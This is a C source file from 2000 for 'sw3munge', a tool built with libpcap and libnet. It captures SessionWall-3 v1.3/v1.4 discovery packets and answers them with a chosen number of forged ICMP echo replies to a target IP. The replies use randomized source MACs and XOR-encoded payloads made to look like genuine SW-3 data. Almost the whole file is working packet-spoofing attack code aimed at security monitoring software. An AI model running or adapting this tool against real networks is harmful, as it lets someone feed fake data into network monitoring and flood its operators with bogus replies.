/* sw3munge.c
 * v1.00 (c) 17/05/2000 codex@bogus.net
 * impossible to do without the research done by fake@bogus.net and 
 * mael@bogus.net.
 *
 * this code will capture sw-3 (tested on v1.3 and v1.4) discovery packets
 * then send N fake reply packets back.
 *
 * code is reliant on libnet (www.packetfactory.net) aswell as libpcap
 * (ftp.ee.lbl.gov).
 */

#define ERRBUFSIZE 256
#define BUFSIZE 128
#define SNAPLEN 74                       /* max bytes to capture (14+20+64) */
#define SW3_PACKET_LEN 52                          /* 52+ETH_H+ICMP_H == 74 */

#include <errno.h>
#include <string.h>
#include <pcap/pcap.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <libnet.h>

#ifdef LINUX
#include <linux/socket.h>
#include <linux/inet.h>
#else
#include <sys/socket.h>
#include <arpa/inet.h>
#endif

unsigned char b;
unsigned char PcA;
unsigned char PcB;
unsigned char NcA;
unsigned char NcB;

unsigned char sip[4] = {0x00,0x00,0x00,0x00};
unsigned char dip[4] = {0x00,0x00,0x00,0x00};

unsigned char src_mac[6] = {0xde,0xad,0xbe,0xef,0xca,0xfe};
unsigned char dst_mac[6] = {0xde,0xad,0xbe,0xef,0xca,0xfe};

/* usage() ---------------------------------------------------------------- */

void usage(void) {
  fprintf(stdout,"sw3munge v1.00 (c) 17/05/2000 codex@bogus.net\n");
  fprintf(stdout,"usage: sw3munge [-h] [-v <13|14>] -i <interface> -c <count> -t <target>\n");
  fprintf(stdout,"\t -h : this stuff\n");
  fprintf(stdout,"\t -v : which version to use (default 13)\n");
  fprintf(stdout,"\t -c : number of packets to send\n");
  fprintf(stdout,"\t -i : network device\n");
  fprintf(stdout,"\t -t : target IP\n");
}

/* rnd() -- generate a random number between 0x00 and 0xff ---------------- */

int rnd(void) {
  return(rand()%0xff);
}

/* SendPacket() -- construct fake packet and send it ---------------------- */

int SendPacket(struct libnet_link_int *link,unsigned char *device,
	       int version,unsigned long dst_ip) {

  int c,sent;
 
  unsigned short ident,seqno;

  unsigned char payload[SW3_PACKET_LEN];
  unsigned char buf[SNAPLEN];

  ident=rand()%65535;
  seqno=ident;

  bzero(payload,sizeof(payload));

  /* build ethernet header; fill the source MAC with some random crap */
  
  memcpy(dst_mac,src_mac,6);

  src_mac[0]=rnd();
  src_mac[1]=rnd();
  src_mac[2]=rnd();
  src_mac[3]=rnd();
  src_mac[4]=rnd();
  src_mac[5]=rnd();

  libnet_build_ethernet(dst_mac,src_mac,ETHERTYPE_IP,NULL,SNAPLEN,buf);
  
  /* build something which resembles a valid ip header */

  libnet_build_ip(40,0,rnd(),0,0x20,IPPROTO_ICMP,rand(),dst_ip,
		  NULL,0,buf+LIBNET_ETH_H);
  
  /* fill some "valid" sw-3 data into the buffer -- we currently only have
   * valid info on version v1.3 or less and v1.4. ok, a lame way of doing it
   * but it works.
   */

  if(version!=13 && version!=14) {
    fprintf(stderr,"error: unknown version (use 13 or 14) %d\n",version);
    exit(1);
  }

  if(version==14) {
    (unsigned char)payload[4] = ((unsigned char)src_mac[0] ^ 0x4b);
    (unsigned char)payload[9] = ((unsigned char)src_mac[1] ^ 0x6f);
    (unsigned char)payload[20] = ((unsigned char)src_mac[2] ^ 0x53);
    (unsigned char)payload[12] = ((unsigned char)src_mac[3] ^ 0x61);
    (unsigned char)payload[25] = ((unsigned char)src_mac[4] ^ 0x4d);
    (unsigned char)payload[18] = ((unsigned char)src_mac[5] ^ 0x72);
    (unsigned char)payload[0] = 4;
    (unsigned char)payload[1] = 1;
  }

  if(version==13) {
    (unsigned char)payload[3] = ((unsigned char)src_mac[0] ^ 0x4b);
    (unsigned char)payload[7] = ((unsigned char)src_mac[1] ^ 0x6f);
    (unsigned char)payload[19] = ((unsigned char)src_mac[2] ^ 0x53);
    (unsigned char)payload[13] = ((unsigned char)src_mac[3] ^ 0x61);
    (unsigned char)payload[27] = ((unsigned char)src_mac[4] ^ 0x4d);
    (unsigned char)payload[15] = ((unsigned char)src_mac[5] ^ 0x72);
    (unsigned char)payload[0] = 3;
    (unsigned char)payload[1] = 1;
  }

  libnet_build_icmp_echo(ICMP_ECHOREPLY,0,ident,seqno,payload,
     SW3_PACKET_LEN,buf+LIBNET_ETH_H+LIBNET_IP_H);

  /* whack some extra data into the packet */

  PcA++;
  if(PcA==0x00) PcB++;

  NcA=NcA-2;

  if(NcA==0x00) {
    c=rand()%100;
    fprintf(stderr,"c==%d\n",c);
    if(c<34) NcB=b;
    if(c>33 && c<67) NcB=(b-1);
    if(c>66) NcB=(b-2);
  }

  (unsigned char)buf[18]=PcA;  /* fast positive 8bit counter */
  (unsigned char)buf[19]=PcB;  /* slow positive 8bit counter */
  (unsigned char)buf[36]=NcA;  /* fast negative 8bit counter */
  (unsigned char)buf[37]=NcB;  /* slow negative 8bit counter */

  (unsigned char)buf[38]=(PcA+1);
  (unsigned char)buf[39]=0;
  (unsigned char)buf[40]=(PcA+1);
  (unsigned char)buf[41]=0;

  /* calculate a checksum; fuck knows if we need to
     umm, of course we do. especially we have to do it right. so thanks to
     fake for that one! YAY IT WORKS!!!!!!!!!!
   */

  if((libnet_do_checksum(buf+LIBNET_ETH_H,IPPROTO_ICMP,
			 SW3_PACKET_LEN+LIBNET_ICMP_ECHO_H))<0) {
    fprintf(stderr,"error: libnet_do_checksum: failed on icmp\n");
 
  }

  if((libnet_do_checksum(buf+LIBNET_ETH_H,IPPROTO_IP,
			 SW3_PACKET_LEN+LIBNET_IP_H+LIBNET_ICMP_ECHO_H))<0) {
    fprintf(stderr,"error: libnet_do_checksum: failed on ip\n");
  }

  /* send data -- a sw-3 discovery packet is 74 bytes */

  sent=libnet_write_link_layer(link,device,buf,
			       LIBNET_ETH_H+LIBNET_ICMP_ECHO_H+SW3_PACKET_LEN);

  if(DEBUG) fprintf(stdout,"sent: %d bytes\n",sent);

  return(sent);

}

/* dversion13 -------------------------------------------------------------
 * returns 1 if discover packet from version 1.3 (or less?) is detected
 * UNTESTED!!
 */

int dversion13(char *mac, char *pkt) {
  if(((unsigned char)pkt[45] == ((unsigned char)mac[0] ^ 0x44)) &&
     ((unsigned char)pkt[49] == ((unsigned char)mac[1] ^ 0x41)) &&
     ((unsigned char)pkt[61] == ((unsigned char)mac[2] ^ 0x73)) &&
     ((unsigned char)pkt[55] == ((unsigned char)mac[3] ^ 0x43)) &&
     ((unsigned char)pkt[69] == ((unsigned char)mac[4] ^ 0x6c)) &&
     ((unsigned char)pkt[57] == ((unsigned char)mac[5] ^ 0x55))) {
    return(13);
  }
  return(0);
}

/* dversion14 ------------------------------------------------------------- */
/* returns 1 if discover packet from version 1.4 is detected */

int dversion14(char *mac, char *pkt) {
  if(((unsigned char)pkt[46] == ((unsigned char)mac[0] ^ 0x44)) &&
     ((unsigned char)pkt[51] == ((unsigned char)mac[1] ^ 0x41)) &&
     ((unsigned char)pkt[62] == ((unsigned char)mac[2] ^ 0x73)) &&
     ((unsigned char)pkt[54] == ((unsigned char)mac[3] ^ 0x43)) &&
     ((unsigned char)pkt[67] == ((unsigned char)mac[4] ^ 0x6c)) &&
     ((unsigned char)pkt[60] == ((unsigned char)mac[5] ^ 0x55))) {
    return(14);
  }
  return(0);
}

/* DecodePacket ----------------------------------------------------------- */

int DecodePacket(unsigned char *packet,unsigned char *device,unsigned long
		  dest_ip,int packets) {

  int count,lc,ver;

  unsigned char byte;

  unsigned char icmp_code;
  unsigned char icmp_type;

  struct {
    int ident;
    int seqno;
  } icmp_query,icmp_reply;

  if(DEBUG) {fprintf(stdout,"\n");}

  /* grab MAC address (from link layer) */

  memcpy(&dst_mac,&packet[0],6);
  memcpy(&src_mac,&packet[6],6);

  if(DEBUG) {
    for(count=0;count<6;count++) {
      fprintf(stdout,"%02x",src_mac[count]);
      if(count<5) 
	fprintf(stdout,":");
    }

    fprintf(stdout," => ");

    for(count=0;count<6;count++) {
      fprintf(stdout,"%02x",dst_mac[count]);
      if(count<5) 
	fprintf(stdout,":");
    }
  }

  /* grab some stuff from the IP header */

  memcpy(&dip,&packet[26],4);
  memcpy(&sip,&packet[30],4);

  if(DEBUG) {

    /* source address */

    fprintf(stdout," %d.%d.%d.%d -> ",
	    (unsigned char)dip[0],
	    (unsigned char)dip[1],
	    (unsigned char)dip[2],
	    (unsigned char)dip[3]);

    /* destination address */

    fprintf(stdout,"%d.%d.%d.%d ",
	    (unsigned char)sip[0],
	    (unsigned char)sip[1],
	    (unsigned char)sip[2],
	    (unsigned char)sip[3]);

  }

  /* grab useful data from ICMP payload */

  icmp_code=(unsigned char)packet[34];
  icmp_type=(unsigned char)packet[35];

  /* echo request */

  if((icmp_code == 8) && !icmp_type) {
    memcpy(&icmp_query.ident,&packet[38],2);
    memcpy(&icmp_query.seqno,&packet[40],2);
  }

  /* echo reply */

  if(!icmp_code && !icmp_type) {
    memcpy(&icmp_reply.ident,&packet[38],2);
    memcpy(&icmp_reply.seqno,&packet[40],2);
  }

  if(DEBUG) {
    fprintf(stdout,"icmp %d/%d",icmp_code,icmp_type);
  }

  /* the following loop is for debugging purposes only */

  if(DEBUG) {

    fprintf(stdout,"\n");

    lc=0;

    for(count=0;count<SNAPLEN;count++) {
      fprintf(stdout,"%02x ",(unsigned char)packet[count]);
      lc++;
      if(lc>15) {
	lc=0;
	fprintf(stdout,"\n");
      }
    }
  }

  /* criteria for a sessionwall-3 discover packet:
   *
   * icmp_code==8, icmp_type==0
   *
   * icmp identifier = icmp sequence number
   *
   * (possibly also 4 bytes after sequence number must be zero)
   *
   * dversion13() || dversion14() must return > 0
   *
   */

  if((icmp_code==8) && !icmp_type) {

    /* identifier == sequence number ? */

    if(ntohs(icmp_query.ident) == ntohs(icmp_query.seqno)) {

      /* version 1.3 or 1.4 ? */

      if((ver=dversion13(src_mac,packet)) || 
	 (ver=dversion14(src_mac,packet))) {

	/* sure thing, we've got a match; print out some info (this could
	 * be fake!!) 
	 */

	if(ver<14) {
	  fprintf(stdout,"\nSW-3-DISCOVER: v1.3 or LOWER detected at MAC ",
		  ver);

	  for(count=0;count<6;count++) {
	    fprintf(stdout,"%02x",src_mac[count]);
	    if(count<5) 
	      fprintf(stdout,":");
	  }

	  if(DEBUG) fprintf(stdout,"\n");

	  return(ver);

	} else {
	  fprintf(stdout,"\nSW-3-DISCOVER: v1.4 or HIGHER detected at MAC ",
		  ver);

	  for(count=0;count<6;count++) {
	    fprintf(stdout,"%02x",src_mac[count]);
	    if(count<5) 
	      fprintf(stdout,":");
	  }

	  if(DEBUG) {fprintf(stdout,"\n");}

	  return(ver);

	}
      }
    }
  }

  return(0);

}

/* main() -- the big kahunas ( o ) ( o ) ---------------------------------- */

int main(int argc, char *argv[]) {

  int timeout=180;                                    /* read timeout in ms */
  int promisc=1;                           /* put the i/f into promisc mode */
  int optimize=0;                       /* no optimized packet capture code */
  int c,sent,packets,ver;
  int forced_version=0;

  char errbuf[ERRBUFSIZE];                           /* pcap's error buffer */
  char buffer[BUFSIZE];                          /* buffer to store data in */

  char *filter_spec = "icmp[0] = 0 or icmp[0] = 8";   /* echo request/reply */

  unsigned char *p_ptr;                       /* pointer to captured packet */
  unsigned char *device=NULL;                     /* device to capture from */
  unsigned long dst_ip=0;                        /* where to send the reply */

  bpf_u_int32 network,netmask;

  struct pcap_pkthdr pkt_header;
  struct bpf_program filter_code;
  struct libnet_link_int *link;

  pcap_t *pd;                                  /* capture device descriptor */

  /* seed the random number generator, lame way, but it works */

  srand(getpid());

  /* initialise some bogus counters */

  PcA = rnd();
  PcB = 0;
  NcA = rnd();

  b=rnd();
  c=rand()%100;

  if(c<34) NcB=b;
  if(c>33 && c<67) NcB=(b-1);
  if(c>66) NcB=(b-2);

  /* get command line options, print usage if user fat fingered input */

   while((c = getopt(argc,argv,"v:i:t:c:h")) != EOF) {
    switch(c) {
    case 'v':
      forced_version=atoi(optarg);
      break;
    case 'i':
      device=optarg;
      break;
    case 't':
      if ((dst_ip = libnet_name_resolve(optarg, 1)) == -1) {
	fprintf(stderr,"error: can't resolve host '%s'\n",optarg);
	exit(1);
      }
      break;
    case 'c':
      packets=atoi(optarg);
      if(!packets) {
	usage();
	exit(1);
      }
      break;
    case 'h':
      usage();
      exit(0);
    default:
      usage();
      exit(1);
    }
  }

  /* bail out if no destination ip or device is given */

  if(!device || !dst_ip) {
    usage();
    exit(1);
  }

  /* get packet capture descriptor, exit & fail if not */

  bzero(buffer,sizeof(buffer));

  if(!(pd = pcap_open_live(device,SNAPLEN,promisc,timeout,buffer))) {
    fprintf(stderr,"Couldn't open device %s: %s (root privs?)\n",
	    device,strerror(errno));
    exit(1);
  }

  /* lookup & set network details */

  if(pcap_lookupnet(device,&network,&netmask,errbuf)<0) {
    fprintf(stderr,"Couldn't get network details: %s\n",errbuf);
    exit(1);
  };

  /* compile filter spec */

  if(pcap_compile(pd,&filter_code,filter_spec,optimize,netmask)<0) {
    fprintf(stderr,"Couldn't compile filter: %s\n",pcap_geterr(pd));
    exit(1);
  }

  /* use filter */

  if(pcap_setfilter(pd,&filter_code)<0) {
    fprintf(stderr,"Failed to set filter: %s\n",pcap_geterr(pd));
    exit(1);
  }

  /* open interface for writing */

  if(!(link = libnet_open_link_interface(device,errbuf))) {
    fprintf(stderr,"error: libnet_open_link_interface: %s\n",errbuf);
    exit(1);
  }

  /* loop */

  while(((char *)p_ptr=pcap_next(pd,&pkt_header))>0) {

    /* decode captured packet, send out any replies */

    ver=DecodePacket(p_ptr,device,dst_ip,packets);

    if(forced_version) ver=forced_version; /* some nutters would like this */

    if(ver) {
      for(c=0;c<packets;c++) {
	SendPacket(link,device,ver,dst_ip);
      }
    }

  }

  /* close descriptor; currently we really never get here, should probably
   * write a signal handler */

  pcap_close(pd);

  return(0);
}






